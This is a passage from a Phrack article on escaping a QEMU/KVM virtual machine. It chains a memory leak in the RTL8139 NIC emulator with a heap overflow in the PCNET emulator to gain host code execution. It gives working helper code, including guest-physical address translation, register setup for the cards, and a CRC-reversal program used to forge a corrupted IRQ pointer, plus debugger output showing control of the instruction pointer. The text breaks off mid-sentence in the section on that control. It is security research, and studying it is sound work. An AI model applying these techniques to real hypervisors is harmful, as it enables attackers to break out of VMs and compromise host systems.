Copy Link
Add to Bookmark
Report
Phrack Inc. Volume 16 Issue 70 File 05
==Phrack Inc.==
Volume 0x10, Issue 0x46, Phile #0x05 of 0x0f
|=-----------------------------------------------------------------------=|
|=----------------------------=[ VM escape ]=----------------------------=|
|=-----------------------------------------------------------------------=|
|=-------------------------=[ QEMU Case Study ]=-------------------------=|
|=-----------------------------------------------------------------------=|
|=---------------------------=[ Mehdi Talbi ]=---------------------------=|
|=--------------------------=[ Paul Fariello ]=--------------------------=|
|=-----------------------------------------------------------------------=|
--[ Table of contents
1 - Introduction
2 - KVW/QEMU Overview
2.1 - Workspace Environment
2.2 - QEMU Memory Layout
2.3 - Address Translation
3 - Memory Leak Exploitation
3.1 - The Vulnerable Code
3.2 - Setting up the Card
3.3 - Exploit
4 - Heap-based Overflow Exploitation
4.1 - The Vulnerable Code
4.2 - Setting up the Card
4.3 - Reversing CRC
4.4 - Exploit
5 - Putting All Together
5.1 - RIP Control
5.2 - Interactive Shell
5.3 - VM-Escape Exploit
5.4 - Limitations
6 - Conclusions
7 - Greets
8 - References
9 - Source Code
--[ 1 - Introduction
Virtual machines are nowadays heavily deployed for personal use or within
the enterprise segment. Network security vendors use for instance different
VMs to analyze malwares in a controlled and confined environment. A natural
question arises: can the malware escapes from the VM and execute code on
the host machine?
Last year, Jason Geffner from CrowdStrike, has reported a serious bug in
QEMU affecting the virtual floppy drive code that could allow an attacker
to escape from the VM [1] to the host. Even if this vulnerability has
received considerable attention in the netsec community - probably because
it has a dedicated name (VENOM) - it wasn't the first of it's kind.
In 2011, Nelson Elhage [2] has reported and successfully exploited a
vulnerability in QEMU's emulation of PCI device hotplugging. The exploit is
available at [3].
Recently, Xu Liu and Shengping Wang, from Qihoo 360, have showcased at HITB
2016 a successful exploit on KVM/QEMU. They exploited two vulnerabilities
(CVE-2015-5165 and CVE-2015-7504) present in two different network card
device emulator models, namely, RTL8139 and PCNET. During their
presentation, they outlined the main steps towards code execution on the
host machine but didn't provide any exploit nor the technical details to
reproduce it.
In this paper, we provide a in-depth analysis of CVE-2015-5165 (a
memory-leak vulnerability) and CVE-2015-7504 (a heap-based overflow
vulnerability), along with working exploits. The combination of these two
exploits allows to break out from a VM and execute code on the target host.
We discuss the technical details to exploit the vulnerabilities on QEMU's
network card device emulation, and provide generic techniques that could be
re-used to exploit future bugs in QEMU. For instance an interactive
bindshell that leverages on shared memory areas and shared code.
--[ 2 - KVM/QEMU Overview
KVM (Kernal-based Virtual Machine) is a kernel module that provides full
virtualization infrastructure for user space programs. It allows one to run
multiple virtual machines running unmodified Linux or Windows images.
The user space component of KVM is included in mainline QEMU (Quick
Emulator) which handles especially devices emulation.
----[ 2.1 - Workspace Environment
In effort to make things easier to those who want to use the sample code
given throughout this paper, we provide here the main steps to reproduce
our development environment.
Since the vulnerabilities we are targeting has been already patched, we
need to checkout the source for QEMU repository and switch to the commit
that precedes the fix for these vulnerabilities. Then, we configure QEMU
only for target x86_64 and enable debug:
$ git clone git://git.qemu-project.org/qemu.git
$ cd qemu
$ git checkout bd80b59
$ mkdir -p bin/debug/native
$ cd bin/debug/native
$ ../../../configure --target-list=x86_64-softmmu --enable-debug \
$ --disable-werror
$ make
In our testing environment, we build QEMU using version 4.9.2 of Gcc.
For the rest, we assume that the reader has already a Linux x86_64 image
that could be run with the following command line:
$ ./qemu-system-x86_64 -enable-kvm -m 2048 -display vnc=:89 \
$ -netdev user,id=t0, -device rtl8139,netdev=t0,id=nic0 \
$ -netdev user,id=t1, -device pcnet,netdev=t1,id=nic1 \
$ -drive file=<path_to_image>,format=qcow2,if=ide,cache=writeback
We allocate 2GB of memory and create two network interface cards: RTL8139
and PCNET.
We are running QEMU on a Debian 7 running a 3.16 kernel on x_86_64
architecture.
----[ 2.2 - QEMU Memory Layout
The physical memory allocated for the guest is actually a mmapp'ed private
region in the virtual address space of QEMU. It's important to note that
the PROT_EXEC flag is not enabled while allocating the physical memory of
the guest.
The following figure illustrates how the guest's memory and host's memory
cohabits.
Guest' processes
+--------------------+
Virtual addr space | |
+--------------------+
| |
\__ Page Table \__
\ \
| | Guest kernel
+----+--------------------+----------------+
Guest's phy. memory | | | |
+----+--------------------+----------------+
| |
\__ \__
\ \
| QEMU process |
+----+------------------------------------------+
Virtual addr space | | |
+----+------------------------------------------+
| |
\__ Page Table \__
\ \
| |
+----+-----------------------------------------------++
Physical memory | | ||
+----+-----------------------------------------------++
Additionaly, QEMU reserves a memory region for BIOS and ROM. These mappings
are available in QEMU's maps file:
7f1824ecf000-7f1828000000 rw-p 00000000 00:00 0
7f1828000000-7f18a8000000 rw-p 00000000 00:00 0 [2 GB of RAM]
7f18a8000000-7f18a8992000 rw-p 00000000 00:00 0
7f18a8992000-7f18ac000000 ---p 00000000 00:00 0
7f18b5016000-7f18b501d000 r-xp 00000000 fd:00 262489 [first shared lib]
7f18b501d000-7f18b521c000 ---p 00007000 fd:00 262489 ...
7f18b521c000-7f18b521d000 r--p 00006000 fd:00 262489 ...
7f18b521d000-7f18b521e000 rw-p 00007000 fd:00 262489 ...
... [more shared libs]
7f18bc01c000-7f18bc5f4000 r-xp 00000000 fd:01 30022647 [qemu-system-x86_64]
7f18bc7f3000-7f18bc8c1000 r--p 005d7000 fd:01 30022647 ...
7f18bc8c1000-7f18bc943000 rw-p 006a5000 fd:01 30022647 ...
7f18bd328000-7f18becdd000 rw-p 00000000 00:00 0 [heap]
7ffded947000-7ffded968000 rw-p 00000000 00:00 0 [stack]
7ffded968000-7ffded96a000 r-xp 00000000 00:00 0 [vdso]
7ffded96a000-7ffded96c000 r--p 00000000 00:00 0 [vvar]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
A more detailed explanation of memory management in virtualized environment
can be found at [4].
----[ 2.3 - Address Translation
Within QEMU there exist two translation layers:
- From a guest virtual address to guest physical address. In our exploit,
we need to configure network card devices that require DMA access. For
example, we need to provide the physical address of Tx/Rx buffers to
correctly configure the network card devices.
- From a guest physical address to QEMU's virtual address space. In our
exploit, we need to inject fake structures and get their precise address
in QEMU's virtual address space.
On x64 systems, a virtual address is made of a page offset (bits 0-11) and
a page number. On linux systems, the pagemap file enables userspace process
with CAP_SYS_ADMIN privileges to find out which physical frame each virtual
page is mapped to. The pagemap file contains for each virtual page a 64-bit
value well-documented in kernel.org [5]:
- Bits 0-54 : physical frame number if present.
- Bit 55 : page table entry is soft-dirty.
- Bit 56 : page exclusively mapped.
- Bits 57-60 : zero
- Bit 61 : page is file-page or shared-anon.
- Bit 62 : page is swapped.
- Bit 63 : page is present.
To convert a virtual address to a physical one, we rely on Nelson Elhage's
code [3]. The following program allocates a buffer, fills it with the
string "Where am I?" and prints its physical address:
---[ mmu.c ]---
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <stdlib.h>
#include <fcntl.h>
#include <assert.h>
#include <inttypes.h>
#define PAGE_SHIFT 12
#define PAGE_SIZE (1 << PAGE_SHIFT)
#define PFN_PRESENT (1ull << 63)
#define PFN_PFN ((1ull << 55) - 1)
int fd;
uint32_t page_offset(uint32_t addr)
{
return addr & ((1 << PAGE_SHIFT) - 1);
}
uint64_t gva_to_gfn(void *addr)
{
uint64_t pme, gfn;
size_t offset;
offset = ((uintptr_t)addr >> 9) & ~7;
lseek(fd, offset, SEEK_SET);
read(fd, &pme, 8);
if (!(pme & PFN_PRESENT))
return -1;
gfn = pme & PFN_PFN;
return gfn;
}
uint64_t gva_to_gpa(void *addr)
{
uint64_t gfn = gva_to_gfn(addr);
assert(gfn != -1);
return (gfn << PAGE_SHIFT) | page_offset((uint64_t)addr);
}
int main()
{
uint8_t *ptr;
uint64_t ptr_mem;
fd = open("/proc/self/pagemap", O_RDONLY);
if (fd < 0) {
perror("open");
exit(1);
}
ptr = malloc(256);
strcpy(ptr, "Where am I?");
printf("%s\n", ptr);
ptr_mem = gva_to_gpa(ptr);
printf("Your physical address is at 0x%"PRIx64"\n", ptr_mem);
getchar();
return 0;
}
If we run the above code inside the guest and attach gdb to the QEMU
process, we can see that our buffer is located within the physical address
space allocated for the guest. More precisely, we note that the outputted
address is actually an offset from the base address of the guest physical
memory:
root@debian:~# ./mmu
Where am I?
Your physical address is at 0x78b0d010
(gdb) info proc mappings
process 14791
Mapped address spaces:
Start Addr End Addr Size Offset objfile
0x7fc314000000 0x7fc314022000 0x22000 0x0
0x7fc314022000 0x7fc318000000 0x3fde000 0x0
0x7fc319dde000 0x7fc31c000000 0x2222000 0x0
0x7fc31c000000 0x7fc39c000000 0x80000000 0x0
...
(gdb) x/s 0x7fc31c000000 + 0x78b0d010
0x7fc394b0d010: "Where am I?"
--[ 3 - Memory Leak Exploitation
In the following, we will exploit CVE-2015-5165 - a memory leak
vulnerability that affects the RTL8139 network card device emulator - in
order to reconstruct the memory layout of QEMU. More precisely, we need to
leak (i) the base address of the .text segment in order to build our
shellcode and (ii) the base address of the physical memory allocated for
the guest in order to be able to get the precise address of some injected
dummy structures.
----[ 3.1 - The vulnerable Code
The REALTEK network card supports two receive/transmit operation modes: C
mode and C+ mode. When the card is set up to use C+, the NIC device
emulator miscalculates the length of IP packet data and ends up sending
more data than actually available in the packet.
The vulnerability is present in the rtl8139_cplus_transmit_one function
from hw/net/rtl8139.c:
/* ip packet header */
ip_header *ip = NULL;
int hlen = 0;
uint8_t ip_protocol = 0;
uint16_t ip_data_len = 0;
uint8_t *eth_payload_data = NULL;
size_t eth_payload_len = 0;
int proto = be16_to_cpu(*(uint16_t *)(saved_buffer + 12));
if (proto == ETH_P_IP)
{
DPRINTF("+++ C+ mode has IP packet\n");
/* not aligned */
eth_payload_data = saved_buffer + ETH_HLEN;
eth_payload_len = saved_size - ETH_HLEN;
ip = (ip_header*)eth_payload_data;
if (IP_HEADER_VERSION(ip) != IP_HEADER_VERSION_4) {
DPRINTF("+++ C+ mode packet has bad IP version %d "
"expected %d\n", IP_HEADER_VERSION(ip),
IP_HEADER_VERSION_4);
ip = NULL;
} else {
hlen = IP_HEADER_LENGTH(ip);
ip_protocol = ip->ip_p;
ip_data_len = be16_to_cpu(ip->ip_len) - hlen;
}
}
The IP header contains two fields hlen and ip->ip_len that represent the
length of the IP header (20 bytes considering a packet without options) and
the total length of the packet including the ip header, respectively. As
shown at the end of the snippet of code given below, there is no check to
ensure that ip->ip_len >= hlen while computing the length of IP data
(ip_data_len). As the ip_data_len field is encoded as unsigned short, this
leads to sending more data than actually available in the transmit buffer.
More precisely, the ip_data_len is later used to compute the length of TCP
data that are copied - chunk by chunk if the data exceeds the size of the
MTU - into a malloced buffer:
int tcp_data_len = ip_data_len - tcp_hlen;
int tcp_chunk_size = ETH_MTU - hlen - tcp_hlen;
int is_last_frame = 0;
for (tcp_send_offset = 0; tcp_send_offset < tcp_data_len;
tcp_send_offset += tcp_chunk_size) {
uint16_t chunk_size = tcp_chunk_size;
/* check if this is the last frame */
if (tcp_send_offset + tcp_chunk_size >= tcp_data_len) {
is_last_frame = 1;
chunk_size = tcp_data_len - tcp_send_offset;
}
memcpy(data_to_checksum, saved_ip_header + 12, 8);
if (tcp_send_offset) {
memcpy((uint8_t*)p_tcp_hdr + tcp_hlen,
(uint8_t*)p_tcp_hdr + tcp_hlen + tcp_send_offset,
chunk_size);
}
/* more code follows */
}
So, if we forge a malformed packet with a corrupted length size (e.g.
ip->ip_len = hlen - 1), then we can leak approximatively 64 KB from QEMU's
heap memory. Instead of sending a single packet, the network card device
emulator will end up by sending 43 fragmented packets.
----[ 3.2 - Setting up the Card
In order to send our malformed packet and read leaked data, we need to
configure first Rx and Tx descriptors buffers on the card, and set up some
flags so that our packet flows through the vulnerable code path.
The figure below shows the RTL8139 registers. We will not detail all of
them but only those which are relevant to our exploit:
+---------------------------+----------------------------+
0x00 | MAC0 | MAR0 |
+---------------------------+----------------------------+
0x10 | TxStatus0 |
+--------------------------------------------------------+
0x20 | TxAddr0 |
+-------------------+-------+----------------------------+
0x30 | RxBuf |ChipCmd| |
+-------------+------+------+----------------------------+
0x40 | TxConfig | RxConfig | ... |
+-------------+-------------+----------------------------+
| |
| skipping irrelevant registers |
| |
+---------------------------+--+------+------------------+
0xd0 | ... | |TxPoll| ... |
+-------+------+------------+--+------+--+---------------+
0xe0 | CpCmd | ... |RxRingAddrLO|RxRingAddrHI| ... |
+-------+------+------------+------------+---------------+
- TxConfig: Enable/disable Tx flags such as TxLoopBack (enable loopback
test mode), TxCRC (do not append CRC to Tx Packets), etc.
- RxConfig: Enable/disable Rx flags such as AcceptBroadcast (accept
broadcast packets), AcceptMulticast (accept multicast packets), etc.
- CpCmd: C+ command register used to enable some functions such as
CplusRxEnd (enable receive), CplusTxEnd (enable transmit), etc.
- TxAddr0: Physical memory address of Tx descriptors table.
- RxRingAddrLO: Low 32-bits physical memory address of Rx descriptors
table.
- RxRingAddrHI: High 32-bits physical memory address of Rx descriptors
table.
- TxPoll: Tell the card to check Tx descriptors.
A Rx/Tx-descriptor is defined by the following structure where buf_lo and
buf_hi are low 32 bits and high 32 bits physical memory address of Tx/Rx
buffers, respectively. These addresses point to buffers holding packets to
be sent/received and must be aligned on page size boundary. The variable
dw0 encodes the size of the buffer plus additional flags such as the
ownership flag to denote if the buffer is owned by the card or the driver.
struct rtl8139_desc {
uint32_t dw0;
uint32_t dw1;
uint32_t buf_lo;
uint32_t buf_hi;
};
The network card is configured through in*() out*() primitives (from
sys/io.h). We need to have CAP_SYS_RAWIO privileges to do so. The following
snippet of code configures the card and sets up a single Tx descriptor.
#define RTL8139_PORT 0xc000
#define RTL8139_BUFFER_SIZE 1500
struct rtl8139_desc desc;
void *rtl8139_tx_buffer;
uint32_t phy_mem;
rtl8139_tx_buffer = aligned_alloc(PAGE_SIZE, RTL8139_BUFFER_SIZE);
phy_mem = (uint32)gva_to_gpa(rtl8139_tx_buffer);
memset(&desc, 0, sizeof(struct rtl8139_desc));
desc->dw0 |= CP_TX_OWN | CP_TX_EOR | CP_TX_LS | CP_TX_LGSEN |
CP_TX_IPCS | CP_TX_TCPCS;
desc->dw0 += RTL8139_BUFFER_SIZE;
desc.buf_lo = phy_mem;
iopl(3);
outl(TxLoopBack, RTL8139_PORT + TxConfig);
outl(AcceptMyPhys, RTL8139_PORT + RxConfig);
outw(CPlusRxEnb|CPlusTxEnb, RTL8139_PORT + CpCmd);
outb(CmdRxEnb|CmdTxEnb, RTL8139_PORT + ChipCmd);
outl(phy_mem, RTL8139_PORT + TxAddr0);
outl(0x0, RTL8139_PORT + TxAddr0 + 0x4);
----[ 3.3 - Exploit
The full exploit (cve-2015-5165.c) is available inside the attached source
code tarball. The exploit configures the required registers on the card and
sets up Tx and Rx buffer descriptors. Then it forges a malformed IP packet
addressed to the MAC address of the card. This enables us to read the
leaked data by accessing the configured Rx buffers.
While analyzing the leaked data we have observed that several function
pointers are present. A closer look reveals that these functions pointers
are all members of a same QEMU internal structure:
typedef struct ObjectProperty
{
gchar *name;
gchar *type;
gchar *description;
ObjectPropertyAccessor *get;
ObjectPropertyAccessor *set;
ObjectPropertyResolve *resolve;
ObjectPropertyRelease *release;
void *opaque;
QTAILQ_ENTRY(ObjectProperty) node;
} ObjectProperty;
QEMU follows an object model to manage devices, memory regions, etc. At
startup, QEMU creates several objects and assigns to them properties. For
example, the following call adds a "may-overlap" property to a memory
region object. This property is endowed with a getter method to retrieve
the value of this boolean property:
object_property_add_bool(OBJECT(mr), "may-overlap",
memory_region_get_may_overlap,
NULL, /* memory_region_set_may_overlap */
&error_abort);
The RTL8139 network card device emulator reserves a 64 KB on the heap to
reassemble packets. There is a large chance that this allocated buffer fits
on the space left free by destroyed object properties.
In our exploit, we search for known object properties in the leaked memory.
More precisely, we are looking for 80 bytes memory chunks (chunk size of a
free'd ObjectProperty structure) where at least one of the function
pointers is set (get, set, resolve or release). Even if these addresses are
subject to ASLR, we can still guess the base address of the .text section.
Indeed, their page offsets are fixed (12 least significant bits or virtual
addresses are not randomized). We can do some arithmetics to get the
address of some of QEMU's useful functions. We can also derive the address
of some LibC functions such as mprotect() and system() from their PLT
entries.
We have also noticed that the address PHY_MEM + 0x78 is leaked several
times, where PHY_MEM is the start address of the physical memory allocated
for the guest.
The current exploit searches the leaked memory and tries to resolves (i)
the base address of the .text segment and (ii) the base address of the
physical memory.
--[ 4 - Heap-based Overflow Exploitation
This section discusses the vulnerability CVE-2015-7504 and provides an
exploit that gets control over the %rip register.
----[ 4.1 - The vulnerable Code
The AMD PCNET network card emulator is vulnerable to a heap-based overflow
when large-size packets are received in loopback test mode. The PCNET
device emulator reserves a buffer of 4 kB to store packets. If the ADDFCS
flag is enabled on Tx descriptor buffer, the card appends a CRC to received
packets as shown in the following snippet of code in pcnet_receive()
function from hw/net/pcnet.c. This does not pose a problem if the size of
the received packets are less than 4096 - 4 bytes. However, if the packet
has exactly 4096 bytes, then we can overflow the destination buffer with 4
bytes.
uint8_t *src = s->buffer;
/* ... */
if (!s->looptest) {
memcpy(src, buf, size);
/* no need to compute the CRC */
src[size] = 0;
src[size + 1] = 0;
src[size + 2] = 0;
src[size + 3] = 0;
size += 4;
} else if (s->looptest == PCNET_LOOPTEST_CRC ||
!CSR_DXMTFCS(s) || size < MIN_BUF_SIZE+4) {
uint32_t fcs = ~0;
uint8_t *p = src;
while (p != &src[size])
CRC(fcs, *p++);
*(uint32_t *)p = htonl(fcs);
size += 4;
}
In the above code, s points to PCNET main structure, where we can see that
beyond our vulnerable buffer, we can corrupt the value of the irq variable:
struct PCNetState_st {
NICState *nic;
NICConf conf;
QEMUTimer *poll_timer;
int rap, isr, lnkst;
uint32_t rdra, tdra;
uint8_t prom[16];
uint16_t csr[128];
uint16_t bcr[32];
int xmit_pos;
uint64_t timer;
MemoryRegion mmio;
uint8_t buffer[4096];
qemu_irq irq;
void (*phys_mem_read)(void *dma_opaque, hwaddr addr,
uint8_t *buf, int len, int do_bswap);
void (*phys_mem_write)(void *dma_opaque, hwaddr addr,
uint8_t *buf, int len, int do_bswap);
void *dma_opaque;
int tx_busy;
int looptest;
};
The variable irq is a pointer to IRQState structure that represents a
handler to execute:
typedef void (*qemu_irq_handler)(void *opaque, int n, int level);
struct IRQState {
Object parent_obj;
qemu_irq_handler handler;
void *opaque;
int n;
};
This handler is called several times by the PCNET card emulator. For
instance, at the end of pcnet_receive() function, there is call a to
pcnet_update_irq() which in turn calls qemu_set_irq():
void qemu_set_irq(qemu_irq irq, int level)
{
if (!irq)
return;
irq->handler(irq->opaque, irq->n, level);
}
So, what we need to exploit this vulnerability:
- allocate a fake IRQState structure with a handler to execute (e.g.
system()).
- compute the precise address of this allocated fake structure. Thanks to
the previous memory leak, we know exactly where our fake structure
resides in QEMU's process memory (at some offset from the base address
of the guest's physical memory).
- forge a 4 kB malicious packets.
- patch the packet so that the computed CRC on that packet matches the
address of our fake IRQState structure.
- send the packet.
When this packet is received by the PCNET card, it is handled by the
pcnet_receive function() that performs the following actions:
- copies the content of the received packet into the buffer variable.
- computes a CRC and appends it to the buffer. The buffer is overflowed
with 4 bytes and the value of irq variable is corrupted.
- calls pcnet_update_irq() that in turns calls qemu_set_irq() with the
corrupted irq variable. Out handler is then executed.
Note that we can get control over the first two parameters of the
substituted handler (irq->opaque and irq->n), but thanks to a little trick
that we will see later, we can get control over the third parameter too
(level parameter). This will be necessary to call mprotect() function.
Note also that we corrupt an 8-byte pointer with 4 bytes. This is
sufficient in our testing environment to successfully get control over the
%rip register. However, this poses a problem with kernels compiled without
the CONFIG_ARCH_BINFMT_ELF_RANDOMIZE_PIE flag. This issue is discussed in
section 5.4.
----[ 4.2 - Setting up the Card
Before going further, we need to set up the PCNET card in order to
configure the required flags, set up Tx and Rx descriptor buffers and
allocate ring buffers to hold packets to transmit and receive.
The AMD PCNET card could be accessed in 16 bits mode or 32 bits mode. This
depends on the current value of DWI0 (value stored in the card). In the
following, we detail the main registers of the PCNET card in 16 bits access
mode as this is the default mode after a card reset:
0 16
+----------------------------------+
| EPROM |
+----------------------------------+
| RDP - Data reg for CSR |
+----------------------------------+
| RAP - Index reg for CSR and BCR |
+----------------------------------+
| Reset reg |
+----------------------------------+
| BDP - Data reg for BCR |
+----------------------------------+
The card can be reset to default by accessing the reset register.
The card has two types of internal registers: CSR (Control and Status
Register) and BCR (Bus Control Registers). Both registers are accessed by
setting first the index of the register that we want to access in the RAP
(Register Address Port) register. For instance, if we want to init and
restart the card, we need to set bit0 and bit1 to 1 of register CSR0. This
can be done by writing 0 to RAP register in order to select the register
CSR0, then by setting register CSR to 0x3:
outw(0x0, PCNET_PORT + RAP);
outw(0x3, PCNET_PORT + RDP);
The configuration of the card could be done by filling an initialization
structure and passing the physical address of this structure to the card
(through register CSR1 and CSR2):
struct pcnet_config {
uint16_t mode; /* working mode: promiscusous, looptest, etc. */
uint8_t rlen; /* number of rx descriptors in log2 base */
uint8_t tlen; /* number of tx descriptors in log2 base */
uint8_t mac[6]; /* mac address */
uint16_t _reserved;
uint8_t ladr[8]; /* logical address filter */
uint32_t rx_desc; /* physical address of rx descriptor buffer */
uint32_t tx_desc; /* physical address of tx descriptor buffer */
};
----[ 4.3 - Reversing CRC
As discussed previously, we need to fill a packet with data in such a way
that the computed CRC matches the address of our fake structure.
Fortunately, the CRC is reversible. Thanks to the ideas exposed in [6], we
can apply a 4-byte patch to our packet so that the computed CRC matches a
value of our choice. The source code reverse-crc.c applies a patch to a
pre-filled buffer so that the computed CRC is equal to 0xdeadbeef.
---[ reverse-crc.c ]---
#include <stdio.h>
#include <stdint.h>
#define CRC(crc, ch) (crc = (crc >> 8) ^ crctab[(crc ^ (ch)) & 0xff])
/* generated using the AUTODIN II polynomial
* x^32 + x^26 + x^23 + x^22 + x^16 +
* x^12 + x^11 + x^10 + x^8 + x^7 + x^5 + x^4 + x^2 + x^1 + 1
*/
static const uint32_t crctab[256] = {
0x00000000, 0x77073096, 0xee0e612c, 0x990951ba,
0x076dc419, 0x706af48f, 0xe963a535, 0x9e6495a3,
0x0edb8832, 0x79dcb8a4, 0xe0d5e91e, 0x97d2d988,
0x09b64c2b, 0x7eb17cbd, 0xe7b82d07, 0x90bf1d91,
0x1db71064, 0x6ab020f2, 0xf3b97148, 0x84be41de,
0x1adad47d, 0x6ddde4eb, 0xf4d4b551, 0x83d385c7,
0x136c9856, 0x646ba8c0, 0xfd62f97a, 0x8a65c9ec,
0x14015c4f, 0x63066cd9, 0xfa0f3d63, 0x8d080df5,
0x3b6e20c8, 0x4c69105e, 0xd56041e4, 0xa2677172,
0x3c03e4d1, 0x4b04d447, 0xd20d85fd, 0xa50ab56b,
0x35b5a8fa, 0x42b2986c, 0xdbbbc9d6, 0xacbcf940,
0x32d86ce3, 0x45df5c75, 0xdcd60dcf, 0xabd13d59,
0x26d930ac, 0x51de003a, 0xc8d75180, 0xbfd06116,
0x21b4f4b5, 0x56b3c423, 0xcfba9599, 0xb8bda50f,
0x2802b89e, 0x5f058808, 0xc60cd9b2, 0xb10be924,
0x2f6f7c87, 0x58684c11, 0xc1611dab, 0xb6662d3d,
0x76dc4190, 0x01db7106, 0x98d220bc, 0xefd5102a,
0x71b18589, 0x06b6b51f, 0x9fbfe4a5, 0xe8b8d433,
0x7807c9a2, 0x0f00f934, 0x9609a88e, 0xe10e9818,
0x7f6a0dbb, 0x086d3d2d, 0x91646c97, 0xe6635c01,
0x6b6b51f4, 0x1c6c6162, 0x856530d8, 0xf262004e,
0x6c0695ed, 0x1b01a57b, 0x8208f4c1, 0xf50fc457,
0x65b0d9c6, 0x12b7e950, 0x8bbeb8ea, 0xfcb9887c,
0x62dd1ddf, 0x15da2d49, 0x8cd37cf3, 0xfbd44c65,
0x4db26158, 0x3ab551ce, 0xa3bc0074, 0xd4bb30e2,
0x4adfa541, 0x3dd895d7, 0xa4d1c46d, 0xd3d6f4fb,
0x4369e96a, 0x346ed9fc, 0xad678846, 0xda60b8d0,
0x44042d73, 0x33031de5, 0xaa0a4c5f, 0xdd0d7cc9,
0x5005713c, 0x270241aa, 0xbe0b1010, 0xc90c2086,
0x5768b525, 0x206f85b3, 0xb966d409, 0xce61e49f,
0x5edef90e, 0x29d9c998, 0xb0d09822, 0xc7d7a8b4,
0x59b33d17, 0x2eb40d81, 0xb7bd5c3b, 0xc0ba6cad,
0xedb88320, 0x9abfb3b6, 0x03b6e20c, 0x74b1d29a,
0xead54739, 0x9dd277af, 0x04db2615, 0x73dc1683,
0xe3630b12, 0x94643b84, 0x0d6d6a3e, 0x7a6a5aa8,
0xe40ecf0b, 0x9309ff9d, 0x0a00ae27, 0x7d079eb1,
0xf00f9344, 0x8708a3d2, 0x1e01f268, 0x6906c2fe,
0xf762575d, 0x806567cb, 0x196c3671, 0x6e6b06e7,
0xfed41b76, 0x89d32be0, 0x10da7a5a, 0x67dd4acc,
0xf9b9df6f, 0x8ebeeff9, 0x17b7be43, 0x60b08ed5,
0xd6d6a3e8, 0xa1d1937e, 0x38d8c2c4, 0x4fdff252,
0xd1bb67f1, 0xa6bc5767, 0x3fb506dd, 0x48b2364b,
0xd80d2bda, 0xaf0a1b4c, 0x36034af6, 0x41047a60,
0xdf60efc3, 0xa867df55, 0x316e8eef, 0x4669be79,
0xcb61b38c, 0xbc66831a, 0x256fd2a0, 0x5268e236,
0xcc0c7795, 0xbb0b4703, 0x220216b9, 0x5505262f,
0xc5ba3bbe, 0xb2bd0b28, 0x2bb45a92, 0x5cb36a04,
0xc2d7ffa7, 0xb5d0cf31, 0x2cd99e8b, 0x5bdeae1d,
0x9b64c2b0, 0xec63f226, 0x756aa39c, 0x026d930a,
0x9c0906a9, 0xeb0e363f, 0x72076785, 0x05005713,
0x95bf4a82, 0xe2b87a14, 0x7bb12bae, 0x0cb61b38,
0x92d28e9b, 0xe5d5be0d, 0x7cdcefb7, 0x0bdbdf21,
0x86d3d2d4, 0xf1d4e242, 0x68ddb3f8, 0x1fda836e,
0x81be16cd, 0xf6b9265b, 0x6fb077e1, 0x18b74777,
0x88085ae6, 0xff0f6a70, 0x66063bca, 0x11010b5c,
0x8f659eff, 0xf862ae69, 0x616bffd3, 0x166ccf45,
0xa00ae278, 0xd70dd2ee, 0x4e048354, 0x3903b3c2,
0xa7672661, 0xd06016f7, 0x4969474d, 0x3e6e77db,
0xaed16a4a, 0xd9d65adc, 0x40df0b66, 0x37d83bf0,
0xa9bcae53, 0xdebb9ec5, 0x47b2cf7f, 0x30b5ffe9,
0xbdbdf21c, 0xcabac28a, 0x53b39330, 0x24b4a3a6,
0xbad03605, 0xcdd70693, 0x54de5729, 0x23d967bf,
0xb3667a2e, 0xc4614ab8, 0x5d681b02, 0x2a6f2b94,
0xb40bbe37, 0xc30c8ea1, 0x5a05df1b, 0x2d02ef8d,
};
uint32_t crc_compute(uint8_t *buffer, size_t size)
{
uint32_t fcs = ~0;
uint8_t *p = buffer;
while (p != &buffer[size])
CRC(fcs, *p++);
return fcs;
}
uint32_t crc_reverse(uint32_t current, uint32_t target)
{
size_t i = 0, j;
uint8_t *ptr;
uint32_t workspace[2] = { current, target };
for (i = 0; i < 2; i++)
workspace[i] &= (uint32_t)~0;
ptr = (uint8_t *)(workspace + 1);
for (i = 0; i < 4; i++) {
j = 0;
while(crctab[j] >> 24 != *(ptr + 3 - i)) j++;
*((uint32_t *)(ptr - i)) ^= crctab[j];
*(ptr - i - 1) ^= j;
}
return *(uint32_t *)(ptr - 4);
}
int main()
{
uint32_t fcs;
uint32_t buffer[2] = { 0xcafecafe };
uint8_t *ptr = (uint8_t *)buffer;
fcs = crc_compute(ptr, 4);
printf("[+] current crc = %010p, required crc = \n", fcs);
fcs = crc_reverse(fcs, 0xdeadbeef);
printf("[+] applying patch = %010p\n", fcs);
buffer[1] = fcs;
fcs = crc_compute(ptr, 8);
if (fcs == 0xdeadbeef)
printf("[+] crc patched successfully\n");
}
----[ 4.4 - Exploit
The exploit (file cve-2015-7504.c from the attached source code tarball)
resets the card to its default settings, then configures Tx and Rx
descriptors and sets the required flags, and finally inits and restarts the
card to push our network card config.
The rest of the exploit simply triggers the vulnerability that crashes QEMU
with a single packet. As shown below, qemu_set_irq is called with a
corrupted irq variable pointing to 0x7f66deadbeef. QEMU crashes as there is
no runnable handler at this address.
(gdb) shell ps -e | grep qemu
8335 pts/4 00:00:03 qemu-system-x86
(gdb) attach 8335
...
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x00007f669ce6c363 in qemu_set_irq (irq=0x7f66deadbeef, level=0)
43 irq->handler(irq->opaque, irq->n, level);
--[ 5 - Putting all Together
In this section, we merge the two previous exploits in order to escape from
the VM and get code execution on the host with QEMU's privileges.
First, we exploit CVE-2015-5165 in order to reconstruct the memory layout
of QEMU. More precisely, the exploit tries to resolve the following
addresses in order to bypass ASLR:
- The guest physical memory base address. In our exploit, we need to do
some allocations on the guest and get their precise address within the
virtual address space of QEMU.
- The .text section base address. This serves to get the address of
qemu_set_irq() function.
- The .plt section base address. This serves to determine the addresses of
some functions such as fork() and execv() used to build our shellcode.
The address of mprotect() is also needed to change the permissions of the
guest physical address. Remember that the physical address allocated for
the guest is not executable.
----[ 5.1 - RIP Control
As shown in section 4 we have control over %rip register. Instead of
letting QEMU crash at arbitrary address, we overflow the PCNET buffer with
an address pointing to a fake IRQState that calls a function of our choice.
At first sight, one could be attempted to build a fake IRQState that runs
system(). However, this call will fail as some of QEMU memory mappings are
not preserved across a fork() call. More precisely, the mmapped physical
memory is marked with the MADV_DONTFORK flag:
qemu_madvise(new_block->host, new_block->max_length, QEMU_MADV_DONTFORK);
Calling execv() is not useful too as we lose our hands on the guest
machine.
Note also that one can construct a shellcode by chaining several fake
IRQState in order to call multiple functions since qemu_set_irq() is called
several times by PCNET device emulator. However, we found that it's more
convenient and more reliable to execute a shellcode after having enabled
